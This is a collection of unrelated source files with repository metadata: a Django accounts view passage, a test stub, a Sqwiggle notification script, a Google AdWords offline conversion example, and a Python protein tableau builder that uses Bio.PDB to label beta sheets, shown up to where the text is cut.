        account = RegistrationProfile.objects.activate_user(activation_key)
        if account:
            post_activation_email(self,request,account)
            return redirect('accounts_activation_done')
        return {}
    @view()
    def activation_done(self,request): return
    @view()
    def activation_begin(self,request): return
    @view()
    def registration_done(self,request): return
    def registration_forbidden(self,request):
        # Returned when an already-authenticated user hits the signup view.
        return HttpResponseForbidden(status=403,content='Forbidden')
    @view()
    def add_user(self,request):
        """Registration view: validate create_form, save the user, and
        either start e-mail activation (inactive user) or finish."""
        ctx = {}
        if request.user.is_authenticated():
            return self.registration_forbidden(request)
        if request.method == 'POST':
            form = self.create_form(request.POST,request.FILES)
            if form.is_valid():
                # NOTE(review): called with (request, form) but create_user
                # below is declared as create_user(self, form) -- arity
                # mismatch; confirm which signature subclasses implement.
                user = self.create_user(request,form)
                user.save()
                if not user.is_active:
                    # NOTE(review): uses self.request although this view
                    # receives `request` as a parameter -- confirm the
                    # attribute exists on Resource.
                    site = get_current_site(self.request)
                    registration_profile = RegistrationProfile.objects.create_profile(user)
                    registration_profile.send_activation_email(site)
                    return redirect('accounts_activation_begin')
                else:
                    return redirect('accounts_registration_done')
        else:
            form = self.create_form()
        ctx['form'] = form
        return ctx
    def is_signup_allowed(self):
        # Hook for subclasses; no-op here.
        pass
    def create_user(self,form):
        # Hook for subclasses; no-op here (see arity note in add_user).
        pass
    @view("(\w+)")
    def email_confirm(self,request,activation_key):
        """Confirm an e-mail address change/registration by key."""
        account = EmailConfirmation.objects.confirm(activation_key)
        # NOTE(review): render(self, request, ...) passes the resource where
        # django.shortcuts.render expects the request first -- confirm.
        return render(self,request,'registration/email_confirmation.html',{'account':account})
    @view("(\d+)")
    def avatar(self,request,uid):
        """Redirect to the avatar URL of the user with primary key `uid`."""
        user = get_object_or_404(User,pk=uid)
        url = user.get_avatar_url()
        return redirect(url)
    @view("(\d+)")
    def profile(self,request,uid):
        """Redirect to the profile page of the user with primary key `uid`."""
        user = get_object_or_404(User,pk=uid)
        url = user.get_profile().get_absolute_url()
        return redirect(url)
    @view("(\w+)")
    def presence(self,request,username):
        """Return the user's presence value as a plain-text response."""
        user = get_object_or_404(User,username=username)
        return HttpResponse(content=str( user.presence ), status = 200 )
    @view()
    def check_username(self,request):
        """AJAX availability check: JSON true if ?username= is available."""
        name = request.GET.get('username',False)
        if name:
            result = User.objects.filter(username__iexact=name).exists()
        else:
            result = name
        return HttpResponse(content=json.dumps(not result),mimetype='plain/text',status=200)
    @view()
    def check_email(self,request):
        """AJAX availability check: JSON true if ?email= is available."""
        email = request.GET.get('email',False)
        if email:
            result = User.objects.filter(email__iexact=email).exists()
        else:
            result = email
        return HttpResponse(content=json.dumps(not result),mimetype='plain/text',status=200)
#from django.contrib.auth.views import AuthenticationForm, login as orig_login
#
#def login(request):
## if request.is_ajax():
## return render(request,"registration/login_xhr.html", dict( form = AuthenticationForm() ) )
## else:
# return orig_login(request)
| {
"content_hash": "2cb52cb4a0057d91eab23106690d1920",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 120,
"avg_line_length": 37.5,
"alnum_prop": 0.5994285714285714,
"repo_name": "vivek2010/django_bolts",
"id": "a2be6e150f9a7d1100699d0b8101f3214b8820e0",
"size": "5250",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_bolts/views/accounts.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "135421"
}
],
"symlink_target": ""
} |
from unittest import TestCase
import numpy as np
import pandas as pd
import hf_bi
| {
"content_hash": "faa8464a61b0297d812368ac52d6b6a1",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 29,
"avg_line_length": 18,
"alnum_prop": 0.7444444444444445,
"repo_name": "welfare520/hf_bi",
"id": "bc23f94eeceb93eb1b5f206515c18567fa84997e",
"size": "90",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hf_bi/tests/test_churn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "954"
}
],
"symlink_target": ""
} |
import sys

import sqwiggle

# Usage: main.py <token> <room_id> <message>
# sys.argv[0] is the script name, so 4 entries means 3 user arguments.
if len(sys.argv) < 4:
    # The old message claimed "4 arguments" even though only 3 are
    # user-supplied; state the actual usage instead.
    print('Usage: main.py <token> <room_id> <message>')
    sys.exit(1)

token = sys.argv[1]     # Sqwiggle API token
room_id = sys.argv[2]   # target room ID
message = sys.argv[3]   # HTML message body

client = sqwiggle.Sqwiggle(token=token)
# parse=False so Sqwiggle does not rewrite the supplied HTML.
client.method('/messages', method='POST',
              parameters={'room_id': room_id, 'text': message,
                          'format': 'html', 'parse': False})
| {
"content_hash": "458a06f82ddc6d461dc9afdf0f9c707e",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 125,
"avg_line_length": 27.307692307692307,
"alnum_prop": 0.6704225352112676,
"repo_name": "hijonathan/step-sqwiggle-notify",
"id": "51e68304f057481a1be56a6c47067e78efa16e01",
"size": "355",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2190"
},
{
"name": "Shell",
"bytes": "2052"
}
],
"symlink_target": ""
} |
"""Imports offline conversion values for specific clicks into your account.
To get THE Google Click ID for a click, run a CLICK_PERFORMANCE_REPORT.
Tags: ConversionTrackerService.mutate, OfflineConversionFeedService.mutate
"""
__author__ = 'Joseph DiLallo'
from googleads import adwords
CONVERSION_NAME = 'INSERT_CONVERSION_NAME_HERE'
# Your click ID must be less than 30 days old.
CLICK_ID = 'INSERT_GOOGLE_CLICK_ID_HERE'
# The conversion time must be more recent than the time of the click.
CONVERSION_TIME = 'INSERT_CONVERSION_TIME_HERE'
CONVERSION_VALUE = 'INSERT_CONVERSION_VALUE_HERE'
def main(client, conversion_name, click_id, conversion_time, conversion_value):
  """Create an UploadConversion tracker, then attach one offline conversion.

  Args:
    client: initialized adwords.AdWordsClient.
    conversion_name: name for the new upload conversion type.
    click_id: Google Click ID (per module comment, < 30 days old).
    conversion_time: conversion timestamp (must postdate the click).
    conversion_value: value to record for the conversion.
  """
  # Initialize appropriate services.
  conversion_tracker_service = client.GetConversionTrackerService(
      version='v201309')
  offline_conversion_feed_service = client.GetOfflineConversionFeedService(
      version='v201309')
  # Once created, this entry will be visible under
  # Tools and Analysis->Conversion and will have "Source = Import".
  upload_conversion = {
      'xsi_type': 'UploadConversion',
      'category': 'PAGE_VIEW',
      'name': conversion_name,
      'viewthroughLookbackWindow': '30',
      'ctcLookbackWindow': '90'
  }
  upload_conversion_operation = {
      'operator': 'ADD',
      'operand': upload_conversion
  }
  response = conversion_tracker_service.mutate(
      [upload_conversion_operation])
  new_upload_conversion = response['value'][0]
  print ('New upload conversion type with name \'%s\' and ID \'%s\' was '
         'created.' % (new_upload_conversion['name'],
                       new_upload_conversion['id']))
  # Associate offline conversions with the upload conversion we created.
  feed = {
      'conversionName': conversion_name,
      'conversionTime': conversion_time,
      'conversionValue': conversion_value,
      'googleClickId': click_id
  }
  offline_conversion_operation = {
      'operator': 'ADD',
      'operand': feed
  }
  offline_conversion_response = offline_conversion_feed_service.mutate(
      [offline_conversion_operation])
  new_feed = offline_conversion_response['value'][0]
  print ('Uploaded offline conversion value of \'%s\' for Google Click ID '
         '\'%s\' to \'%s\'.' % (new_feed['conversionValue'],
                                new_feed['googleClickId'],
                                new_feed['conversionName']))
if __name__ == '__main__':
  # Initialize client object from the stored adwords credentials file,
  # then run with the placeholder constants defined at the top of the file.
  adwords_client = adwords.AdWordsClient.LoadFromStorage()
  main(adwords_client, CONVERSION_NAME, CLICK_ID, CONVERSION_TIME,
       CONVERSION_VALUE)
| {
"content_hash": "cf89ac135105786bf5edba903d77390d",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 79,
"avg_line_length": 32.6375,
"alnum_prop": 0.6790501723477594,
"repo_name": "jdilallo/jdilallo-test",
"id": "7dc63846f1c74aacbf877336402919743a91c5e6",
"size": "3229",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/adwords/v201309/advanced_operations/upload_offline_conversions.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "722738"
}
],
"symlink_target": ""
} |
"""
Build a protein tableau.
The implemntation is actually in pttableau.py which is used by ptgraph2.py
(Pro-Origami),
Also used to create SSE midpoint distance matrix.
Tableaux are described by Kamat and Lesk 2007
'Contact Patterns Between Helices and Strands of Sheet Define Protein
Folding Patterns' Proteins 66:869-876
and Lesk 2003 'From Electrons to Proteins and Back Again'
Int. J. Quant. Chem. 95:678-682
and Lesk 1995 'Systematic representation of folding patterns'
J. Mol. Graph. 13:159-164.
The implementation is based on Arun Konagurthu's TableauCreator program, see
Konagurthu, Stuckey and Lesk 2008 'Structural search and retrieval using
a tableau representation of protein folding patterns' Bioinformatics
(advance access, to be published Jan 5 2008).
Filenames may be either in the format above or the pdbq1lp.pdb format.
Compressed pdb files are supported (gzip) (e.g. pdb1qlp.ent.gz).
It is written in Python and depends on some Python libraries:
. BioPython (including Bio.PDB)
http://www.biopython.org
Reference for Bio.PDB is:
Hamelryck and Manderick 2003 "PDB parser and structure class implemented
in Python" Bioinformatics 19:2308-2310
which in turn depends on Numeric
http://sourceforge.net/projects/numpy
Developed on Linux 2.6.9 (x86_64) with Python 2.5.1
and BioPython 1.43 with Numeric 24.2
"""
import warnings # so we can suppress the annoying tempnam 'security' warning
import sys,os
import getopt
import numpy.oldnumeric as Numeric
from Bio.PDB import *
from ptnode import *
import pttableau
import ptsecstruct
from ptdomain import *
from ptutils import cleanup_tmpdir,get_int_icode,biopdbresid_to_pdbresseq
from domeval import *
import getdomains
from ptdistmatrix import compute_sse_midpoint_dist_matrix
#-----------------------------------------------------------------------------
#
# Class definitions
#
#-----------------------------------------------------------------------------
#
# Empty classes for exceptions
#
class NoSSE_Exception(Exception): # raised when no helices or strands found
    """Raised when a domain/structure contains no helix or strand SSEs."""
    pass
#
# Real classes
#
class TableauBuild:
"""
The protein representation consists of a sequence of structure
(helix, strand) nodes with sequence edges in and out of them in
sequence from N-terminus to C-terminus and adjacency edges for
SSEs less than a threshold distance apart.
Note there may be multiple such sequences (one for each
chain).
Also the nodes are all labelled with start and end residue
sequence numbers, and node types etc. but this is not used at all
in the here, it is only included because this code was reused from
another program (ptraph2.py) which does require the node
labelling.
"""
#
# member functions
#
    def __init__(self, pdb_structure, pdbid,
                 include_310_helices = False, include_pi_helices = False,
                 add_loop_nodes = False):
        """
        Construct empty TableauBuild. To build the structure call
        build_graph_from_secstruct().
        Parameters:
           pdb_structure - parsed PDB structure from Bio.PDB
           pdbid - PDB identifier
           include_310_helices - include 3_10 helices in the graph if True
           include_pi_helices - include pi_helices in the graph if True
           add_loop_nodes - include nodes for loop regions between SSEs if True
                            (NOTE(review): stored nowhere below -- appears
                            unused by this class; confirm.)
        """
        self.pdb_struct = pdb_structure
        self.pdbid = pdbid
        self.chain_dict = None  # Each value of the chain_dict is a
                                # List of nodes in order from N to C terminus
                                # so chain_dict is { chainid : node_list }
        self.seqnum2node = {}   # dictionary of { seqnum : PTNode }
                                # maping int sequence numbers to PTNode objs
        self.tableau = None     # PTTableau build in build_tableau
        self.include_310_helices = include_310_helices
        self.include_pi_helices = include_pi_helices
        self.pdb_resid_dict = None # dict of { {chainid,pdb_resseq) : seqindx }
                                   # where chainid and pdb_resseq make up
                                   # the PDB residue identifier, the pdb_resseq
                                   # being string resnum+icode if any e.g.
                                   # '60' or '60A', seqindx is the indiex
                                   # into sequential list of all residues
                                   # residue_list.
        self.residue_list = None   # list of all residues (for all chains)
                                   # in sequence, built by get_residue_list()
def iter_chains(self):
"""
This generator function iterates over all chains in this PTGraph.
A chain is just a list of nodes so it yields a node list for each
chain.
Parameters: Nonde.
Return value: YIELDs a node list.
Uses data members (readony):
chain_dict - dict of {chainid:node_list}
"""
# FIXME: can we just 'return self.chain_dict.itervalues()' here?
for nodelist in self.chain_dict.itervalues():
yield nodelist
def iter_nodes(self):
"""
This generator function iterates over all the node in this PTGraph.
Parameters: None
Return Value: YIELDs a node.
Uses data members: (readonly):
chain_dict - dict of {chainid_node_list}
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
yield ptnode
    def build_graph_from_secstruct(self, secstruct, domain, chainid=None,
                                   ignore_insertion_codes=False):
        """
        Build the list of nodes from the supplied PTSecStruct
        object.
        Parameters:
            secstruct - PTSecStruct (ptsecstruct.py) object to build from
            domain - PTDomain (ptdomain.py) object listing the segment(s)
                     that make up this domain (only one domain processed at a
                     time).
                     (in/out) NOTE: may be modified by having a segment
                     added if SSE is only partly in domain.
            chainid - chain identifier to build graph for only this chain,
                      or None for all chains (default)
            ignore_insertion_codes - If True, a hack to make it work with
                      PMML (only) which does not report insertion codes
                      unlike DSSP and STRIDE
        Uses member data (write):
            chain_dict - dict of { chainid : node_list } where node_list is
                        list of nodes in order, built in this function
            secstruct - keeps a pointer to the supplied secstruct
          (readonly):
            pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
                         for this protein.
            include_310_helices, include_pi_helices - if true, include
                         these kinds of helices.
        Raises exceptions:
           NoSSE_Exception if no helices or strands found
        Return value:
            None.
        """
        self.secstruct = secstruct
        helix_num = 1
        strand_num = 1
        num_helices_in_domain = 0
        num_strands_in_domain = 0
        #
        # Build dictionary mapping (chainid, pdb_resid) to index in residue_list
        # for ALL residues, not just those in this domain.
        #
        self.residue_list = self.get_residue_list(self.pdb_struct,
                                                  PTDomain(None, None))
        self.pdb_resid_dict = {}
        seq_indx = 0
        while seq_indx < len(self.residue_list):
            residue = self.residue_list[seq_indx]
            self.pdb_resid_dict[( ptsecstruct.pdb_chainid_to_stride_chainid(
                residue.get_full_id()[2]),
                                  biopdbresid_to_pdbresseq(
                                      residue.get_id(),
                                      ignore_insertion_codes)
                                  )] = seq_indx
            seq_indx += 1
        # Note that now we are only adding elements in the supplied domain,
        # so the so-called 'chains' may really be segments, i.e. subsequences
        # of chains (rest of chain may be in other domain(s)
        self.chain_dict = {} # dict of {chainid : node_list}
        # --- Pass 1: build a PTNodeHelix for every helix in the domain ---
        for (start_chainid, start_resnum, end_chainid, end_resnum, helixtype) \
                in secstruct.helix_list:
            assert(start_chainid == end_chainid) #helix must be same chain
            if chainid and chainid != start_chainid:
                continue # chainid specified, skip ones not in that chain
            # will consider structures in domain if first residue is in domain
            if domain.is_in_domain(start_chainid,
                                   get_int_icode(start_resnum)[0]):
                num_helices_in_domain += 1
                # helixtype is the DSSP/STRIDE code: H=alpha, I=pi, G=3_10
                if helixtype == "H":
                    idprefix = "ALPHAHELIX_"
                    htype = "ALPHA"
                    this_helix_num = helix_num
                    helix_num += 1
                elif helixtype == "I":
                    if not self.include_pi_helices:
                        continue
                    idprefix = "PIHELIX_"
                    htype = "PI"
                    this_helix_num = helix_num
                    helix_num += 1
                elif helixtype == "G":
                    if not self.include_310_helices:
                        continue
                    idprefix = "310HELIX_"
                    htype = "310"
                    this_helix_num = helix_num
                    helix_num += 1
                else: # shouldn't happen
                    sys.stderr.write("ERROR: bad helix type " + helixtype+"\n")
                ah_node = PTNodeHelix(htype,
                                      idprefix + start_chainid+"_" +\
                                      str(this_helix_num),
                                      this_helix_num,
                                      start_resnum, end_resnum, start_chainid,
                                      domain.domainid,
                                      self.residue_list, self.pdb_resid_dict)
                if not self.chain_dict.has_key(start_chainid):
                    self.chain_dict[start_chainid] = []
                self.chain_dict[start_chainid].append(ah_node)
                # we must already have handled the case of SSEs that cross
                # domain boundaries (by moving whole SSE to one of the domains)
                assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
        # --- Pass 2: build a PTNodeStrand for every strand in the domain ---
        for (start_chainid, start_resnum, end_chainid, end_resnum) \
                in secstruct.strand_list:
            assert(start_chainid == end_chainid) # must be in same chain
            if chainid and chainid != start_chainid:
                continue # chainid specified, skip ones not in that chain
            if domain.is_in_domain(start_chainid,
                                   get_int_icode(start_resnum)[0]):
                num_strands_in_domain += 1
                bs_node = PTNodeStrand("STRAND_"+start_chainid +"_"+\
                                       str(strand_num),
                                       strand_num,
                                       start_resnum, end_resnum, start_chainid,
                                       domain.domainid,
                                       self.residue_list,
                                       self.pdb_resid_dict)
                strand_num += 1
                if not self.chain_dict.has_key(start_chainid):
                    self.chain_dict[start_chainid] = []
                # we must already have handled the case of SSEs that cross
                # domain boundaries (by moving whole SSE to one of the domains)
                assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
                self.chain_dict[start_chainid].append(bs_node)
        # raise an exception if there are no SSEs at all in this domain
        if num_helices_in_domain == 0 and num_strands_in_domain == 0:
            raise NoSSE_Exception
        # --- Pass 3: sort each chain's nodes; drop chains with no drawable SSE
        delete_chainid_list = [] # list of chainids to delete from chain_dict
        for (chainid, nodelist) in self.chain_dict.iteritems():
            # sort in order of start residue id ascending (all must be disjoint)
            nodelist.sort()
            if len(nodelist) < 1:
                # There are no SSEs in this chain, get rid of it.
                sys.stderr.write('WARNING: no SSEs in chain ' + chainid +
                                 '; chain ignored\n')
                delete_chainid_list.append(chainid) # don't delete while in loop
                continue
            else:
                # Check for chain with only SSEs that will not be drawn
                # (i.e. pi or 310 helices), and delete those too
                found_useful_node = False
                for ptnode in nodelist:
                    if isinstance(ptnode, PTNodeStrand):
                        found_useful_node = True
                        break
                    elif isinstance(ptnode, PTNodeHelix):
                        if ptnode.get_type() == "ALPHA":
                            found_useful_node = True
                            break
                        elif ((ptnode.get_type() == "310" and
                               self.include_310_helices) or
                              (ptnode.get_type() == "PI" and
                               self.include_pi_helices)):
                            found_useful_node = True
                            break
                if not found_useful_node:
                    sys.stderr.write('WARNING: only pi or 310 helices in chain '
                                     + chainid +
                                     '; chain ignored\n')
                    delete_chainid_list.append(chainid)
                    continue
        # delete chains from chain_dict that were marked earlier for deletion
        for chainid in delete_chainid_list:
            self.chain_dict.pop(chainid)
        # -------------------------------------------------------------------
        # This is needed only for labelling sheets for HH and KK codes
        # (see dfs_strands() etc. below)
        # add edges for hydrogen bonds
        # uses secstruct and chainid member data
        # these are used for determining which side bridge partners are
        # on (and also for drawing a hydrogen bond graph if requested)
        self.add_hbond_edges_from_secstruct()
        # add edges for bridge partners
        # uses secstruct and chainid member data
        self.add_bridge_edges_from_secstruct()
        #---------------------------------------------------------------------
        # for sequential numbering, we'll build this dictionary mapping
        # sequential number (note NOT restarting for each chain)
        # to PTNode
        # so that sequential numbers as used in ptgraph2 -b sequential
        # option.
        # this is a dictionary of { seqnum : PTNode }
        self.seqnum2node = {}
        for (seqnum, node) in \
                enumerate([node for node in self.iter_nodes() if \
                           not ( (isinstance(node, PTNodeTerminus)) or
                                 (isinstance(node, PTNodeHelix) and
                                  ( (node.get_type() == "310" and
                                     not self.include_310_helices) or
                                    (node.get_type() == "PI" and
                                     not self.include_pi_helices) ) ) ) ]):
            self.seqnum2node[seqnum+1] = node # start at 1 not 0
# ------------------------------------------------------------------------
    def get_residue_list(self, pdb_struct, domain, getchainid = None):
        """
        Return list of Bio.PDB Residue objects in this domain, and optionally
        in the specified chain.

        NOTE(review): the `pdb_struct` parameter is never used -- the body
        reads self.pdb_struct instead. Callers in this file pass
        self.pdb_struct anyway, so behavior matches, but the signature is
        misleading; confirm before relying on the parameter.

        Parameters:
             pdb_struct - Bio.PDB parsed PDB struct for the protein
             domain - PTDomain (ptdomain.py) object listing the segment(s)
                         that make up this domain (only one domain processed at a
                         time).
             getchainid - chain identifier to get residues in (default None -
                       all chains).
        Return value:
             list of Bio.PDB Residue objects in the domain (and optionally chain).
        Raises exceptions:
           NoSSE_Exception for empty structure (happens eg on d1oayi_.ent)
        """
        residue_list = []
        try:
            pdb_model = self.pdb_struct[0] # TODO always using model 0 for now
        except KeyError:
            raise NoSSE_Exception
        for chain in pdb_model:
            chainid = ptsecstruct.pdb_chainid_to_stride_chainid(chain.get_id())
            if getchainid and getchainid != chainid:
                continue # this is not the chain we want
            # Build a list of Bio.PDB Residue objects that are in this
            # domain.
            # id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
            # so we choose those where residue PDB number
            # (in the current chain) is in the domain.
            # TODO: maybe should use polypeptide builder for this instead
            # (and indeed should probably use it right from the beginning) -
            residue_list += [ residue for residue in chain.get_unpacked_list()
                              if is_aa(residue) and
                              domain.is_in_domain(chainid, residue.get_id()[1])
                            ]
            if getchainid:
                break # if getchainid specified, we now have it so can quit
        return residue_list
# iter_strands(), dfs_strands(),
# find_connected_components() and label_sheets() are needed to assign
# strands to sheets in order for HH and KK codes to be used for strands
# only when they are in the same sheet.
# TODO this code is cut&pasted from ptgraph2.py, probably should
# have a base class that this at PTGraph2 both inherit from or somethibng
# rather than all this duplication.
def add_hbond_edges_from_secstruct(self):
"""
Add edges between structural elements for hydrogen bonds between
those nodes. Called by build_graph_from_secstruct().
NB: adds bonds between STRANDs only, not between HELIXes (helices).
Parameters: None.
Return value: None.
Uses data members:
readonly:
secstruct - PTSecStruct object to get hbonds from
chainid - chainid of chain in PTSecStruct to use
read/write:
chain_dict - dict by chainid of
list of nodes (changes node data, not list as such)
Precondition: each nodelist in chain_dict
is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
hbond_list = self.secstruct.hbond_list
# TODO: do this more efficiently using presorting (ie how it used to
# be done when only one chain)
for (chainid1, resnum1, chainid2, resnum2, dist) in hbond_list:
for ptnode in self.iter_strands():
if chainid1 == ptnode.get_chainid() and \
resnum1 >= ptnode.get_start_res_seq() and \
resnum1 <= ptnode.get_end_res_seq():
dest_node = self.find_node_containing_seqnum(resnum2,
chainid2)
if dest_node != None and \
isinstance(dest_node, PTNodeStrand): # only STRANDs
ptnode.add_hbond(dest_node, resnum1, resnum2, dist)
def add_bridge_edges_from_secstruct(self):
    """
    Add edges between strand nodes representing beta bridges between
    those nodes (add just one edge between any two strands).
    Called by build_graph_from_secstruct().

    NB: adds bonds between STRANDs only, not between HELIXes (helices).

    Parameters: None.
    Return value: None.
    Uses data members:
       readonly:
          secstruct - PTSecStruct object to get hbonds from
          chainid - chainid of chain in PTSecStruct to use
       read/write:
          chain_dict - dict by chainid of
                       list of nodes (changes node data, not list as such)
    """
    bridge_list = self.secstruct.bridgeres_list
    #  (chainid1, resnum1, chainid2, resnum2, bdir)
    # TODO: do this more efficiently using presorting (ie how it used to
    # be done when only one chain)
    for ptnode in self.iter_strands():
        for (chainid1, resnum1, chainid2, resnum2, bdir) in bridge_list:
            # does this bridge originate inside the current strand?
            if (chainid1 == ptnode.get_chainid() and
                ptnode.get_start_res_seq() <= resnum1
                                           <= ptnode.get_end_res_seq()):
                try:
                    dest_node = self.find_node_containing_seqnum(resnum2,
                                                                 chainid2)
                except KeyError:
                    # partner chain may have been removed by domain parsing
                    dest_node = None
                    sys.stderr.write('WARNING: chain ' + chainid2 +
                                     ' involved in beta bridge not found.' +
                                     '\n Probably due to domain parsing' +
                                     ' breaking a beta sheet.\n')
                if dest_node is not None and \
                   isinstance(dest_node, PTNodeStrand): # only STRANDs
                    if ptnode == dest_node:
                        sys.stderr.write('WARNING: ignoring self-bridge ' +
                                         ptnode.nodeid + '\n')
                    else:
                        ptnode.add_bridge(dest_node, bdir)
def iter_strands(self):
    """
    Generator over every strand node in this PTGraph object.

    Walks the node list of each chain and yields only the
    PTNodeStrand instances found there.

    Parameters: None.
    Return value: YIELDs a strand.
    Uses data members (readonly):
       self.chain_dict - dict of { chainid : list of nodes }
    """
    for nodelist in self.iter_chains():
        for candidate in nodelist:
            if not isinstance(candidate, PTNodeStrand):
                continue
            yield candidate
def find_node_containing_seqnum(self, res_seqnum, chainid):
    """
    Find and return the node in the node list for chain chainid that
    contains the supplied PDB residue sequence number.

    Parameters:
       res_seqnum - PDB residue sequence number to find node for
       chainid - chain identifier to find node in
    Return value:
       PTNode pointer of PTNode containing the supplied residue seq num
       in supplied chainid
       or None if the residue is not in a structural element PTNode
    Uses data members (readonly):
       chain_dict - chainid dict of list of PTNodes
    """
    # TODO: since node_list is sorted should use binary search here
    # (maybe try the Python bisect module)
    # NOTE: dict.has_key() is deprecated (and gone in Python 3);
    # the 'in' operator is equivalent and works everywhere.
    if chainid not in self.chain_dict:
        return None # no such chain, can happen due to domain parsing
    for ptnode in self.chain_dict[chainid]:
        if ptnode.is_in_interval(res_seqnum):
            return ptnode
    return None
def dfs_strands(self, start_strand, visited, dfs_list, from_node,
                back_edge_list,
                sheet_id=None):
    """
    Make a depth-first search traversal of STRAND nodes
    using bridge (not sequence)
    edges starting at the specified strand.

    Parameters:
       start_strand - STRAND node to start at
       visited - (in/out) dictionary of {ptnode:True} visited nodes
       dfs_list - (in/out) list of ptnodes visited in dfs order
       from_node - node from which we are being (recursively) called
       back_edge_list - list of (node, node) tuples representing an
                        edge between the two nodes, which is a back
                        edge, i.e. from a node to an ancestor of that
                        node in the spanning tree.  The back edge
                        means there is a cycle of which the back
                        edge forms a part.
       sheet_id - identifier of this sheet (connected component) to mark
                  each strand in it with, or None to not mark at all
                  (default).

    Recursive function. call initially as
        dfslist = []
        back_edge_list = []
        dfs_strands(startnode, {}, dfslist, None, back_edge_list)

    Return value:
        None. (Output is dfs_list, back_edge_list parameters)
    Uses members (readonly):
        chain_dict - dict by chainid of list of PTNodes
    """
    visited[start_strand] = True
    if sheet_id is not None:
        start_strand.set_sheet_id(sheet_id)
    dfs_list.append(start_strand)
    for (node, bdir_unused, side_unused) in start_strand.get_bridge_list():
        if node not in visited:
            self.dfs_strands(node, visited, dfs_list, start_strand,
                             back_edge_list, sheet_id)
        elif node != from_node: # not parent of start_strand in spanning tree
            # don't add duplicate back edges
            # ((node1,node2) is same as (node2,node1));
            # tuple membership does the same elementwise == comparison
            # the old explicit loop did
            if ((start_strand, node) not in back_edge_list and
                (node, start_strand) not in back_edge_list):
                if verbose:
                    sys.stderr.write('dfs_strands back edge from ' +
                                     str(start_strand) + ' to ' +
                                     str(node) +
                                     '\n')
                back_edge_list.append((start_strand, node))
def find_connected_components(self):
    """
    Find the connected components (considering only STRAND nodes
    and bridge [not sequence] edges in the graph).

    A DFS traversal is started from every not-yet-visited strand;
    each traversal collects one connected component (sheet).

    Parameters: None

    Uses member data:
       chain_dict - dict by chainid of list
                     of PTNodes in the graph (modifies PTNodes not list)
      (WRITE):
       sheet_dict -
          dictionary of { sheet_id : ptnode_list } where sheet_id is 'A',
          'B', etc. and ptnode_list is a list of PTNodeStrand instances
          in that connected component (sheet).
       self.sheet_backedges_dict -
           dict of {sheet_id : ((node1,node2))}
           listing 'back edges' i.e. edges to an ancestor in the DFS
           spanning tree in the connected component (sheet).
           Note (node1,node2) and (node2,node1) are the same
           (undirected graph) and only one of the two is in the list.

    Labels each strand node with the sheet id it belongs to as it goes.
    """
    # sheet ids are single chars 'A'..'Z'; more than 26 sheets can
    # actually happen (e.g. on 2J28), so wrap around to lowercase
    sheet_id = 'A'
    visited = {}   # {ptnode : True} for strands already reached
    self.sheet_dict = {}
    self.sheet_backedges_dict = {}
    for strand in self.iter_strands():
        if strand in visited:
            continue
        component = []
        backedges = []
        self.dfs_strands(strand, visited, component, None,
                         backedges,
                         sheet_id)
        self.sheet_dict[sheet_id] = list(component)
        self.sheet_backedges_dict[sheet_id] = list(backedges)
        sheet_id = chr(ord(sheet_id) + 1)
        if sheet_id == '[':     # one past 'Z'
            sheet_id = 'a'      # wrap to lowercase
def label_sheets(self):
    """
    Label strands with the sheet id to which each belongs by finding
    connected components; strands in a connected component of
    the graph (considering only STRAND nodes and bridge edges)
    form a sheet.

    Parameters: None
    Uses member data:
       node_list - list of nodes. Modifies nodes by labelling them.

    Return value:
       Returns the sheet dictionary (dictionary of
       { sheet_id : ptnode_list }) from find_connected_components.
    """
    # find_connected_components() performs the labelling itself (more
    # efficient, since it knows which sheet each strand joins as it is
    # added), so this method simply delegates to it.
    return self.find_connected_components()
# -------------------------------------------------------------------------
def build_tableau(self, pdbid, domain, ptnode_list = None,
                  use_hk = True):
    """
    Build the tableau data member (see PTTableau in pttableau.py)
    by calling function in pttableau.py.

    Parameters:
         pdbid - PDB identifier of the structure
         domain - The PTDomain object for our current domain
         ptnode_list - list of PTNodes (in sequence order, but not
                       necessarily contiguous) to build the tableau for,
                       or None to use all nodes in domain.
                       Default None.
         use_hk - If True, use the HH and KK codes for respectively
                  antiparallel and parallel strands. Default True.

    Return value: None

    Uses data members (WRITE):
        tableau - created by this function
      (readonly):
        chain_dict - dict { chainid : ptnode_list } of nodes in chains
        pdb_struct - Bio.PDB parsed PDB structure
    """
    if ptnode_list is None:
        # Build list of all helix and strand PTNodes
        # (iter_chains() yields only the nodes in our domain)
        ptnode_list = [node
                       for nodelist in self.iter_chains()
                       for node in nodelist
                       if not isinstance(node, PTNodeTerminus)]
    self.tableau = pttableau.compute_tableau(ptnode_list, self.pdb_struct,
                                             use_hk)
def build_omega_matrix(self, pdbid, domain, ptnode_list = None):
    """
    Return the relative angles matrix by calling function in pttableau.py

    Parameters:
         pdbid - PDB identifier of the structure
         domain - The PTDomain object for our current domain
         ptnode_list - list of PTNodes (in sequence order, but not
                       necessarily contiguous) to build the tableau for,
                       or None to use all nodes in domain.
                       Default None.

    Return value: Numeric.array Omega matrix.

    Uses data members:
      (readonly):
        chain_dict - dict { chainid : ptnode_list } of nodes in chains
        pdb_struct - Bio.PDB parsed PDB structure
    """
    if ptnode_list is None:
        # Build list of all helix and strand PTNodes
        # (iter_chains() yields only the nodes in our domain)
        ptnode_list = [node
                       for nodelist in self.iter_chains()
                       for node in nodelist
                       if not isinstance(node, PTNodeTerminus)]
    return pttableau.compute_omega_matrix(ptnode_list, self.pdb_struct)
def build_sse_dist_matrix(self, pdbid, domain, ptnode_list = None):
